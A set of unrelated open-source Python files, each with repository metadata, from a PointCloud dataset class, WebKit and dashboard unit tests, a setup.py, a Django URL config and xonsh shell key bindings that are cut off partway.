3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 6
|
2021-05-10T09:42:01.000Z
|
2022-01-04T08:03:42.000Z
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 3
|
2021-08-16T02:19:10.000Z
|
2022-01-10T02:05:48.000Z
|
lidardet/datasets/base.py
|
Jiaolong/trajectory-prediction
|
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
|
[
"Apache-2.0"
] | 1
|
2021-07-15T00:51:58.000Z
|
2021-07-15T00:51:58.000Z
|
import numpy as np
from pathlib import Path
from collections import defaultdict
from torch.utils.data import Dataset
from .registry import DATASETS
from .augmentor import DataAugmentor
from .processor import DataProcessor
@DATASETS.register
class PointCloudDataset(Dataset):
def __init__(self, cfg, logger=None):
self.cfg = cfg
self.logger = logger
self.class_names = cfg.class_names
self.root_path = Path(cfg.root_path)
if self.cfg.get('augmentor', None):
self.data_augmentor = DataAugmentor(self.root_path, cfg.augmentor, self.class_names, logger)
if self.cfg.get('pre_processor', None):
self.pre_processor = DataProcessor(cfg.pre_processor)
def __len__(self):
raise NotImplementedError
def forward(self, index):
raise NotImplementedError
def augment_data(self, data_dict):
if data_dict.get('gt_names', None) is not None:
gt_boxes_mask = np.array([n in self.class_names for n in data_dict['gt_names']], dtype=np.bool_)
data_dict = self.data_augmentor.forward(
data_dict={
**data_dict,
'gt_boxes_mask': gt_boxes_mask
}
)
else:
data_dict = self.data_augmentor.forward(
data_dict={**data_dict})
if data_dict.get('gt_boxes', None) is not None:
if len(data_dict['gt_boxes']) == 0:
new_index = np.random.randint(self.__len__())
return self.__getitem__(new_index)
return data_dict
def pre_process(self, data_dict):
data_dict = self.pre_processor.forward(data_dict)
return data_dict
@staticmethod
def collate_batch(batch_list, _unused=False):
data_dict = defaultdict(list)
for cur_sample in batch_list:
for key, val in cur_sample.items():
data_dict[key].append(val)
batch_size = len(batch_list)
ret = {}
for key, val in data_dict.items():
if key in ['voxels', 'voxel_num_points']:
ret[key] = np.concatenate(val, axis=0)
elif key in ['points', 'voxel_coords']:
coors = []
for i, coor in enumerate(val):
coor_pad = np.pad(coor, ((0, 0), (1, 0)), mode='constant', constant_values=i)
coors.append(coor_pad)
ret[key] = np.concatenate(coors, axis=0)
elif key in ['gt_boxes']:
max_gt = max([len(x) for x in val])
batch_gt_boxes3d = np.zeros((batch_size, max_gt, val[0].shape[-1]), dtype=np.float32)
for k in range(batch_size):
batch_gt_boxes3d[k, :val[k].__len__(), :] = val[k]
ret[key] = batch_gt_boxes3d
else:
ret[key] = np.stack(val, axis=0)
ret['batch_size'] = batch_size
return ret
| 35.333333
| 108
| 0.584232
|
c4cf69bcf3f38f0cafb6db86de951fd40b2deddf
| 2,733
|
py
|
Python
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 6
|
2021-07-05T16:09:39.000Z
|
2022-03-06T22:44:42.000Z
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 7
|
2022-03-15T13:25:39.000Z
|
2022-03-15T13:25:44.000Z
|
Tools/Scripts/webkitpy/tool/steps/update_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.config.ports import MacPort, MacWK2Port
from webkitpy.tool.mocktool import MockOptions, MockTool
from webkitpy.tool.steps.update import Update
class UpdateTest(unittest.TestCase):
def test_update_command_non_interactive(self):
tool = MockTool()
options = MockOptions(non_interactive=True)
step = Update(tool, options)
self.assertEqual(["mock-update-webkit"], step._update_command())
tool._deprecated_port = MacPort()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
tool._deprecated_port = MacWK2Port()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
def test_update_command_interactive(self):
tool = MockTool()
options = MockOptions(non_interactive=False)
step = Update(tool, options)
self.assertEqual(["mock-update-webkit"], step._update_command())
tool._deprecated_port = MacPort()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
tool._deprecated_port = MacWK2Port()
self.assertEqual(["Tools/Scripts/update-webkit"], step._update_command())
| 44.803279
| 81
| 0.749726
|
d74b324b256310dd42659b194a31eefeac0fc9de
| 1,177
|
py
|
Python
|
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
setup.py
|
sushilkanathia/todoist-python
|
d277e8294eeec2f23445ec26a1dc11367e451930
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#The OS module in python provides functions for interacting with the operating system. OS, comes under Python's standard utility modules.
import os
#Setuptools is a package development process library designed to facilitate packaging Python projects by enhancing the Python standard library distutils.
from setuptools import setup
def read(fname):
try:
return open(os.path.join(os.path.dirname(__file__), fname)).read()
except Exception:
return ""
#Internal Process
setup(
name="todoist-python",
version="8.1.2",
packages=["todoist", "todoist.managers"],
author="Doist Team",
author_email="info@todoist.com",
license="BSD",
description="todoist-python - The official Todoist Python API library",
long_description=read("README.md"),
install_requires=[
"requests",
"typing;python_version<'3.5'",
],
# see here for complete list of classifiers
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=(
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
),
)
| 31.810811
| 153
| 0.683093
|
0453689c0f49be882bf8832f16ed3d96188fc9df
| 666
|
py
|
Python
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | 2
|
2021-12-18T01:52:50.000Z
|
2022-01-17T19:41:52.000Z
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | 18
|
2021-11-30T04:05:53.000Z
|
2022-02-01T03:30:04.000Z
|
tests/method/test_method_print_bound_method.py
|
sco1/pylox
|
b4820828306c20cee3f8533c2547fafb92c6c1bd
|
[
"MIT"
] | null | null | null |
from textwrap import dedent
import pytest
from pylox.lox import Lox
# Base cases from https://github.com/munificent/craftinginterpreters/blob/master/test/method/print_bound_method.lox
TEST_SRC = dedent(
"""\
class Foo {
method() { }
}
var foo = Foo();
print foo.method; // expect: <fn method>
"""
)
EXPECTED_STDOUTS = ["<fn method>"]
def test_print_bound_method(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
| 22.2
| 115
| 0.701201
|
d05644267a753a63685ad8b0fd6897473430c213
| 750
|
py
|
Python
|
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
untitled/untitled/urls.py
|
EvgenDEP1/untitled
|
66e33b5f4114f5cc86575f6a242ceefde84a7165
|
[
"Apache-2.0"
] | null | null | null |
"""untitled URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 34.090909
| 77
| 0.709333
|
7d7956a4a4a648d8a2212f423b26901429d7c12a
| 16,345
|
py
|
Python
|
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | 6
|
2020-07-19T21:51:44.000Z
|
2022-02-13T08:22:58.000Z
|
dashboard/dashboard/speed_releasing_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | 1
|
2020-07-24T18:22:03.000Z
|
2020-07-24T18:22:03.000Z
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import speed_releasing
from dashboard.common import datastore_hooks
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
from dashboard.models import table_config
_SAMPLE_BOTS = ['ChromiumPerf/win', 'ChromiumPerf/linux']
_DOWNSTREAM_BOTS = ['ClankInternal/win', 'ClankInternal/linux']
_SAMPLE_TESTS = ['my_test_suite/my_test', 'my_test_suite/my_other_test']
_SAMPLE_LAYOUT = ('{ "my_test_suite/my_test": ["Foreground", '
'"Pretty Name 1"],"my_test_suite/my_other_test": '
' ["Foreground", "Pretty Name 2"]}')
RECENT_REV = speed_releasing.CHROMIUM_MILESTONES[
speed_releasing.CURRENT_MILESTONE][0] + 42
class SpeedReleasingTest(testing_common.TestCase):
def setUp(self):
super(SpeedReleasingTest, self).setUp()
app = webapp2.WSGIApplication([(
r'/speed_releasing/(.*)',
speed_releasing.SpeedReleasingHandler)])
self.testapp = webtest.TestApp(app)
testing_common.SetSheriffDomains(['chromium.org'])
testing_common.SetIsInternalUser('internal@chromium.org', True)
self.SetCurrentUser('internal@chromium.org', is_admin=True)
def tearDown(self):
super(SpeedReleasingTest, self).tearDown()
self.UnsetCurrentUser()
def _AddInternalBotsToDataStore(self):
"""Adds sample bot/master pairs."""
master_key = ndb.Key('Master', 'ChromiumPerf')
graph_data.Bot(
id='win', parent=master_key, internal_only=True).put()
graph_data.Bot(
id='linux', parent=master_key, internal_only=True).put()
def _AddPublicBotsToDataStore(self):
"""Adds sample bot/master pairs."""
master_key = ndb.Key('Master', 'ChromiumPerf')
graph_data.Bot(
id='win', parent=master_key, internal_only=False).put()
graph_data.Bot(
id='linux', parent=master_key, internal_only=False).put()
def _AddTableConfigDataStore(self, name, is_internal, is_downstream=False):
"""Add sample internal only tableConfig."""
keys = self._AddTests(is_downstream)
if is_internal:
self._AddInternalBotsToDataStore()
else:
self._AddPublicBotsToDataStore()
table_config.CreateTableConfig(
name=name, bots=_SAMPLE_BOTS if not is_downstream else _DOWNSTREAM_BOTS,
tests=_SAMPLE_TESTS,
layout=_SAMPLE_LAYOUT,
username='internal@chromium.org',
override=0)
return keys
def _AddTests(self, is_downstream):
master = 'ClankInternal' if is_downstream else 'ChromiumPerf'
testing_common.AddTests([master], ['win', 'linux'], {
'my_test_suite': {
'my_test': {},
'my_other_test': {},
},
})
keys = [
utils.TestKey(master + '/win/my_test_suite/my_test'),
utils.TestKey(master + '/win/my_test_suite/my_other_test'),
utils.TestKey(master + '/linux/my_test_suite/my_test'),
utils.TestKey(master + '/linux/my_test_suite/my_other_test'),
]
for test_key in keys:
test = test_key.get()
test.units = 'timeDurationInMs'
test.put()
return keys
def _AddAlertsWithDifferentMasterAndBenchmark(self):
"""Adds 10 alerts with different benchmark/master."""
master = 'FakeMaster'
testing_common.AddTests([master], ['win'], {
'my_fake_suite': {
'my_fake_test': {},
},
})
keys = [
utils.TestKey(master + '/win/my_fake_suite/my_fake_test'),
]
self._AddRows(keys)
self._AddAlertsToDataStore(keys)
def _AddAlertsToDataStore(self, test_keys):
"""Adds sample data, including triaged and non-triaged alerts."""
key_map = {}
for test_key in test_keys:
test = test_key.get()
test.improvement_direction = anomaly.DOWN
test.put()
# Add some (10 * len(keys)) non-triaged alerts.
for end_rev in range(420500, 421500, 100):
for test_key in test_keys:
ref_test_key = utils.TestKey('%s_ref' % utils.TestPath(test_key))
anomaly_entity = anomaly.Anomaly(
start_revision=end_rev - 5, end_revision=end_rev, test=test_key,
median_before_anomaly=100, median_after_anomaly=200,
ref_test=ref_test_key)
anomaly_entity.SetIsImprovement()
anomaly_key = anomaly_entity.put()
key_map[end_rev] = anomaly_key
return key_map
def _AddRows(self, keys):
for key in keys:
testing_common.AddRows(utils.TestPath(key), [1, 2, 3, RECENT_REV])
def _AddDownstreamRows(self, keys):
revisions = [1, 2, 1485025126, 1485099999]
for key in keys:
testing_common.AddRows(
utils.TestPath(key), revisions)
for key in keys:
for rev in revisions:
row_key = utils.GetRowKey(key, rev)
row = row_key.get()
row.r_commit_pos = str(rev // 10000)
row.a_default_rev = 'r_foo'
row.r_foo = 'abcdefghijk'
row.put()
def testGet_ShowPage(self):
response = self.testapp.get('/speed_releasing/')
self.assertIn('speed-releasing-page', response)
def testPost_InternalListPage(self):
self._AddTableConfigDataStore('BestTable', True)
self._AddTableConfigDataStore('SecondBestTable', True)
self._AddTableConfigDataStore('ThirdBestTable', False)
response = self.testapp.post('/speed_releasing/')
self.assertIn('"show_list": true', response)
self.assertIn('"list": ["BestTable", "SecondBestTable", '
'"ThirdBestTable"]', response)
def testPost_ShowInternalTable(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=1&revB=2')
self.assertIn('"name": "BestTable"', response)
self.assertIn('"table_bots": ["ChromiumPerf/win", '
'"ChromiumPerf/linux"]', response)
self.assertIn('"table_tests": ["my_test_suite/my_test",'
' "my_test_suite/my_other_test"]', response)
self.assertIn('"table_layout"', response)
self.assertIn('"revisions": [2, 1]', response)
self.assertIn('"display_revisions": [2, 1]', response)
self.assertIn('"units": {"my_test_suite/my_test": "timeDurationInMs", '
'"my_test_suite/my_other_test": "timeDurationInMs"',
response)
self.assertIn('"categories": {"Foreground": 2}', response)
self.assertIn('"values": {"1": {"ChromiumPerf/linux": '
'{"my_test_suite/my_test": 1.0, '
'"my_test_suite/my_other_test": 1.0}, '
'"ChromiumPerf/win": {"my_test_suite/my_test": 1.0, '
'"my_test_suite/my_other_test": 1.0}}, '
'"2": {"ChromiumPerf/linux": {"my_test_suite/my_test": '
'2.0, "my_test_suite/my_other_test": 2.0}, '
'"ChromiumPerf/win": {"my_test_suite/my_test": 2.0, '
'"my_test_suite/my_other_test": 2.0}}}', response)
self.assertIn('"urls": {"ChromiumPerf/linux/my_test_suite/my_other_test": '
'"?masters=ChromiumPerf&start_rev=1&checked=my_other_test&'
'tests=my_test_suite%2Fmy_other_test&end_rev=2&bots=linux", '
'"ChromiumPerf/win/my_test_suite/my_other_test": '
'"?masters=ChromiumPerf&start_rev=1&checked=my_other_test&'
'tests=my_test_suite%2Fmy_other_test&end_rev=2&bots=win", '
'"ChromiumPerf/linux/my_test_suite/my_test": "?masters'
'=ChromiumPerf&start_rev=1&checked=my_test&tests='
'my_test_suite%2Fmy_test&end_rev=2&bots=linux", '
'"ChromiumPerf/win/my_test_suite/my_test": "?masters='
'ChromiumPerf&start_rev=1&checked=my_test&tests=my_test_suite'
'%2Fmy_test&end_rev=2&bots=win"}',
response)
def testPost_InternalListPageToExternalUser(self):
self._AddTableConfigDataStore('BestTable', True)
self._AddTableConfigDataStore('SecondBestTable', True)
self._AddTableConfigDataStore('ThirdBestTable', False)
self.UnsetCurrentUser()
datastore_hooks.InstallHooks()
response = self.testapp.post('/speed_releasing/')
self.assertIn('"show_list": true', response)
self.assertIn('"list": ["ThirdBestTable"]', response)
def testPost_ShowInternalTableToExternalUser(self):
self._AddTableConfigDataStore('BestTable', True)
self.UnsetCurrentUser()
self.testapp.post('/speed_releasing/BestTable?revA=1&revB=2', {
}, status=500) # 500 means user can't see data.
def testPost_TableWithTableNameThatDoesntExist(self):
response = self.testapp.post('/speed_releasing/BestTable')
self.assertIn('Invalid table name.', response)
def testPost_TableWithNoRevParamsOnlyDownStream(self):
keys = self._AddTableConfigDataStore('BestTable', True, True)
self._AddDownstreamRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=1485099999&'
'revB=1485025126')
self.assertIn('"revisions": [1485099999, 1485025126]', response)
self.assertIn('"display_revisions": ["148509-abc", "148502-abc"]', response)
def testPost_TableWithMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=56')
self.assertIn('"revisions": [445288, 433400]', response)
self.assertIn('"display_milestones": [56, 56]', response)
self.assertIn('"navigation_milestones": [55, 57]', response)
def testPost_TableWithNewestMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
current_milestone = speed_releasing.CURRENT_MILESTONE
response = self.testapp.post('/speed_releasing/BestTable?m=%s' %
current_milestone)
current_milestone_start_rev = speed_releasing.CHROMIUM_MILESTONES[
current_milestone][0]
self.assertIn(
'"revisions": [%s, %s]' % (
RECENT_REV, current_milestone_start_rev), response)
self.assertIn(
'"display_milestones": [%s, %s]' % (
current_milestone, current_milestone), response)
self.assertIn(
'"navigation_milestones": [%s, null]' % (
current_milestone - 1), response)
def testPost_TableWithHighMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=71')
self.assertIn('"error": "No data for that milestone."', response)
def testPost_TableWithLowMilestoneParam(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?m=7')
self.assertIn('"error": "No data for that milestone."', response)
def testPost_TableWithNoRevParams(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable')
current_milestone_start_rev = speed_releasing.CHROMIUM_MILESTONES[
speed_releasing.CURRENT_MILESTONE][0]
self.assertIn(
'"revisions": [%s, %s]' % (
RECENT_REV, current_milestone_start_rev), response)
def testPost_TableWithRevParamEndRevAlsoStartRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=433400')
self.assertIn('"revisions": [445288, 433400]', response)
def testPost_TableWithOneRevParamUniqueEndRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revA=423768')
self.assertIn('"revisions": [423768, 416640]', response)
self.assertIn('"display_milestones": [54, 54]', response)
self.assertIn('"navigation_milestones": [null, 55]', response)
def testPost_TableWithOneRevParamBetweenMilestones(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=455000')
self.assertIn('"revisions": [463842, 455000]', response)
self.assertIn('"display_milestones": [58, 58]', response)
def testPost_TableWithRevParamMiddleRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=444000')
self.assertIn('"revisions": [445288, 444000]', response)
self.assertIn('"display_milestones": [56, 56]', response)
def testPost_TableWithRevParamHighRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=50000000')
self.assertIn('"revisions": [50000000, %s]' % RECENT_REV, response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevParamLowRev(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?revB=1')
self.assertIn('"revisions": [%s, 1]' % RECENT_REV, response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevsParamTwoMilestones(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revA=417000&revB=440000')
self.assertIn('"revisions": [440000, 417000]', response)
self.assertIn('"display_milestones": [54, 56]', response)
self.assertIn('"navigation_milestones": [null, 56]', response)
def testPost_TableWithRevsParamHigh(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revA=50000000&revB=60000000')
self.assertIn('"revisions": [60000000, 50000000]', response)
self.assertIn('"display_milestones": [%s, %s]' % ((
speed_releasing.CURRENT_MILESTONE,)*2), response)
def testPost_TableWithRevsParamSelfContained(self):
keys = self._AddTableConfigDataStore('BestTable', True)
self._AddRows(keys)
response = self.testapp.post('/speed_releasing/BestTable?'
'revB=420000&revA=421000')
self.assertIn('"revisions": [421000, 420000]', response)
self.assertIn('"display_milestones": [54, 54]', response)
def testPost_ReleaseNotes(self):
keys = self._AddTableConfigDataStore('BestTable', True, False)
self._AddRows(keys)
self._AddAlertsToDataStore(keys)
self._AddAlertsWithDifferentMasterAndBenchmark()
response = self.testapp.post('/speed_releasing/BestTable?'
'revB=420000&revA=421000&anomalies=true')
self.assertIn('"revisions": [421000, 420000]', response)
# Make sure we aren't getting a table here instead of Release Notes.
self.assertNotIn('"display_revisions"', response)
# There are 50 anomalies total (5 tests on 10 revisions). 1 test does not
# have the correct master/benchmark, so 4 valid tests. Further, the
# revisions are [420500:421500:100] meaning that there are 6 revisions in
# the url param's range. 6*4 = 24 anomalies that should be returned.
anomaly_list = self.GetJsonValue(response, 'anomalies')
self.assertEqual(len(anomaly.Anomaly.query().fetch()), 50)
self.assertEqual(len(anomaly_list), 24)
for alert in anomaly_list:
self.assertEqual(alert['master'], 'ChromiumPerf')
self.assertIn(alert['test'], ['my_test', 'my_other_test'])
self.assertGreaterEqual(alert['end_revision'], 420000)
self.assertLessEqual(alert['end_revision'], 421000)
| 43.355438
| 80
| 0.683451
|
0f40446a71d7f7175cd34aa9ab457e35c182fb6d
| 14,735
|
py
|
Python
|
xonsh/ptk_shell/key_bindings.py
|
meramsey/xonsh
|
5685ffc8b8aa921012b31dc8af02e14388b730e9
|
[
"BSD-2-Clause-FreeBSD"
] | 4,716
|
2016-06-07T05:48:42.000Z
|
2022-03-31T22:30:15.000Z
|
xonsh/ptk_shell/key_bindings.py
|
meramsey/xonsh
|
5685ffc8b8aa921012b31dc8af02e14388b730e9
|
[
"BSD-2-Clause-FreeBSD"
] | 3,644
|
2016-06-07T05:55:42.000Z
|
2022-03-31T13:25:57.000Z
|
xonsh/ptk_shell/key_bindings.py
|
agoose77/xonsh
|
7331d8aee50e8939f8fe4d5b7133ed3907f204f4
|
[
"BSD-2-Clause-FreeBSD"
] | 576
|
2016-06-07T06:28:32.000Z
|
2022-03-31T02:46:15.000Z
|
# -*- coding: utf-8 -*-
"""Key bindings for prompt_toolkit xonsh shell."""
from prompt_toolkit import search
from prompt_toolkit.application.current import get_app
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (
Condition,
IsMultiline,
HasSelection,
EmacsInsertMode,
ViInsertMode,
IsSearching,
)
from prompt_toolkit.keys import Keys
from prompt_toolkit.input import ansi_escape_sequences
from prompt_toolkit.key_binding.key_bindings import KeyBindings, KeyBindingsBase
from prompt_toolkit.key_binding.bindings.named_commands import get_by_name
from xonsh.aliases import xonsh_exit
from xonsh.tools import (
check_for_partial_string,
get_line_continuation,
ends_with_colon_token,
)
from xonsh.built_ins import XSH
from xonsh.platform import ON_WINDOWS
from xonsh.shell import transform_command
DEDENT_TOKENS = frozenset(["raise", "return", "pass", "break", "continue"])
def carriage_return(b, cli, *, autoindent=True):
"""Preliminary parser to determine if 'Enter' key should send command to the
xonsh parser for execution or should insert a newline for continued input.
Current 'triggers' for inserting a newline are:
- Not on first line of buffer and line is non-empty
- Previous character is a colon (covers if, for, etc...)
- User is in an open paren-block
- Line ends with backslash
- Any text exists below cursor position (relevant when editing previous
multiline blocks)
"""
doc = b.document
at_end_of_line = _is_blank(doc.current_line_after_cursor)
current_line_blank = _is_blank(doc.current_line)
env = XSH.env
indent = env.get("INDENT") if autoindent else ""
partial_string_info = check_for_partial_string(doc.text)
in_partial_string = (
partial_string_info[0] is not None and partial_string_info[1] is None
)
# indent after a colon
if ends_with_colon_token(doc.current_line_before_cursor) and at_end_of_line:
b.newline(copy_margin=autoindent)
b.insert_text(indent, fire_event=False)
# if current line isn't blank, check dedent tokens
elif (
not current_line_blank
and doc.current_line.split(maxsplit=1)[0] in DEDENT_TOKENS
and doc.line_count > 1
):
b.newline(copy_margin=autoindent)
b.delete_before_cursor(count=len(indent))
elif not doc.on_first_line and not current_line_blank:
b.newline(copy_margin=autoindent)
elif doc.current_line.endswith(get_line_continuation()):
b.newline(copy_margin=autoindent)
elif doc.find_next_word_beginning() is not None and (
any(not _is_blank(i) for i in doc.lines_from_current[1:])
):
b.newline(copy_margin=autoindent)
elif not current_line_blank and not can_compile(doc.text):
b.newline(copy_margin=autoindent)
elif current_line_blank and in_partial_string:
b.newline(copy_margin=autoindent)
else:
b.validate_and_handle()
def _is_blank(line):
return len(line.strip()) == 0
def can_compile(src):
"""Returns whether the code can be compiled, i.e. it is valid xonsh."""
src = src if src.endswith("\n") else src + "\n"
src = transform_command(src, show_diff=False)
src = src.lstrip()
try:
XSH.execer.compile(src, mode="single", glbs=None, locs=XSH.ctx)
rtn = True
except SyntaxError:
rtn = False
except Exception:
rtn = True
return rtn
@Condition
def tab_insert_indent():
"""Check if <Tab> should insert indent instead of starting autocompletion.
Checks if there are only whitespaces before the cursor - if so indent
should be inserted, otherwise autocompletion.
"""
before_cursor = get_app().current_buffer.document.current_line_before_cursor
return bool(before_cursor.isspace())
@Condition
def tab_menu_complete():
"""Checks whether completion mode is `menu-complete`"""
return XSH.env.get("COMPLETION_MODE") == "menu-complete"
@Condition
def beginning_of_line():
"""Check if cursor is at beginning of a line other than the first line in a
multiline document
"""
app = get_app()
before_cursor = app.current_buffer.document.current_line_before_cursor
return bool(
len(before_cursor) == 0 and not app.current_buffer.document.on_first_line
)
@Condition
def end_of_line():
"""Check if cursor is at the end of a line other than the last line in a
multiline document
"""
d = get_app().current_buffer.document
at_end = d.is_cursor_at_the_end_of_line
last_line = d.is_cursor_at_the_end
return bool(at_end and not last_line)
@Condition
def should_confirm_completion():
"""Check if completion needs confirmation"""
return (
XSH.env.get("COMPLETIONS_CONFIRM") and get_app().current_buffer.complete_state
)
# Copied from prompt-toolkit's key_binding/bindings/basic.py
@Condition
def ctrl_d_condition():
"""Ctrl-D binding is only active when the default buffer is selected and
empty.
"""
if XSH.env.get("IGNOREEOF"):
return False
else:
app = get_app()
buffer_name = app.current_buffer.name
return buffer_name == DEFAULT_BUFFER and not app.current_buffer.text
@Condition
def autopair_condition():
"""Check if XONSH_AUTOPAIR is set"""
return XSH.env.get("XONSH_AUTOPAIR", False)
@Condition
def whitespace_or_bracket_before():
"""Check if there is whitespace or an opening
bracket to the left of the cursor"""
d = get_app().current_buffer.document
return bool(
d.cursor_position == 0
or d.char_before_cursor.isspace()
or d.char_before_cursor in "([{"
)
@Condition
def whitespace_or_bracket_after():
"""Check if there is whitespace or a closing
bracket to the right of the cursor"""
d = get_app().current_buffer.document
return bool(
d.is_cursor_at_the_end_of_line
or d.current_char.isspace()
or d.current_char in ")]}"
)
def wrap_selection(buffer, left, right=None):
selection_state = buffer.selection_state
for start, end in buffer.document.selection_ranges():
buffer.transform_region(start, end, lambda s: f"{left}{s}{right}")
# keep the selection of the inner expression
# e.g. `echo |Hello World|` -> `echo "|Hello World|"`
buffer.cursor_position += 1
selection_state.original_cursor_position += 1
buffer.selection_state = selection_state
